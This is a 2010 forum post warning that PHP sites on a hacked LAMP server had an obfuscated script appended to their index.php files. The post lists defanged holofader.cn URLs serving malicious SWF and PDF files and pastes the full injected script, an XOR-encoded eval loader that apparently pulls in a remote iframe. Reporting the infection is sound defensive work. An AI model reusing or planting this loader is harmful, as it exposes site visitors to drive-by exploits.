0 Replies Latest reply on Jan 16, 2010 6:43 AM by asotsiaal

    Beware: pdf/swf exploit - server used holofader.cn

      Forensics team - please investigate!

       

      I found on my LAMP server several vhosts being hacked. All index.php files were appended with the following script. (included)

       

      My personal (honeypot) PC (with IE8) resolved the hash and made an automatic query to the following addresses:

       

      hxxp://holofader.cn/3/moreBook.swf
      hxxp://holofader.cn/3/sByBook.pdf

       

      Possibly the PC is compromized already.

       

       

      ---------

       

      <script>zcsgwzlawtk=new Array(34,41,37,51,43,35,40,50,104,49,52,47,50,35,110,100,122,36,41,34,63,120,12 2,53,37,52,47,54,50,120,48,39,52,102,3
      6,52,37,55,43,62,35,49,48,41,123,97,32,52,97,125,48,39,52,102,33,48,47,43,45,42, 36,39,52,51,123,97,47,97,125,48,39,52,102,37,40,63,48,60,42,5
      3,34,49,50,51,123,97,43,35,97,125,48,39,52,102,45,46,49,41,35,52,34,55,63,63,63, 123,97,39,97,125,48,39,52,102,47,45,42,44,36,32,33,34,50,35,1
      23,34,41,37,51,43,35,40,50,125,48,39,52,102,53,55,52,48,40,45,55,43,51,62,47,123 ,97,49,47,34,50,46,97,125,48,39,52,102,36,39,43,52,63,45,55,4
      4,50,39,123,97,46,50,50,54,124,105,105,46,41,42,41,32,39,34,35,52,104,37,40,105, 117,105,47,40,34,35,62,104,54,46,54,97,125,48,39,52,102,34,37
      ,39,44,33,50,41,32,43,35,49,123,97,46,35,47,33,46,50,97,125,48,39,52,102,52,46,6 2,35,36,51,43,42,49,40,123,97,53,50,63,42,35,97,125,48,39,52,
      102,40,43,47,34,48,37,35,55,32,33,52,123,97,119,97,125,48,39,52,102,43,42,37,52, 62,46,41,35,63,48,37,123,97,34,47,53,54,42,39,63,124,40,41,40
      ,35,97,125,48,39,52,102,62,62,54,47,50,34,33,33,54,41,123,97,53,52,37,97,125,48, 39,52,102,42,55,41,37,48,48,51,45,47,32,123,47,45,42,44,36,32
      ,33,34,50,35,104,37,52,35,39,50,35,3,42,35,43,35,40,50,110,33,48,47,43,45,42,36, 39,52,51,109,36,52,37,55,43,62,35,49,48,41,109,45,46,49,41,35
      ,52,34,55,63,63,63,109,37,40,63,48,60,42,53,34,49,50,51,111,125,42,55,41,37,48,4 8,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,53,5
      5,52,48,40,45,55,43,51,62,47,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55, 41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,3
      5,110,34,37,39,44,33,50,41,32,43,35,49,106,40,43,47,34,48,37,35,55,32,33,52,111, 125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,
      36,51,50,35,110,52,46,62,35,36,51,43,42,49,40,106,43,42,37,52,62,46,41,35,63,48, 37,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50
      ,52,47,36,51,50,35,110,62,62,54,47,50,34,33,33,54,41,106,36,39,43,52,63,45,55,44 ,50,39,111,125,47,45,42,44,36,32,33,34,50,35,104,36,41,34,63,
      104,39,54,54,35,40,34,5,46,47,42,34,110,42,55,41,37,48,48,51,45,47,32,111,125,12 2,105,53,37,52,47,54,50,120,100,111);cxpexelvhw="";ghaceffafi
      =70;lerxenrpuun=eval;ykokgwgpdo=String.fromCharCode;for(ftwktbslnxd in zcsgwzlawtk)cxpexelvhw+=ykokgwgpdo(zcsgwzlawtk[ftwktbslnxd]^ghaceffafi
      );lerxenrpuun(cxpexelvhw);</script>

       

      --------------------

       

       

      Message was edited by: Samantha Price - editing links for the protection of other users.  on 1/16/10 6:43:11 AM CST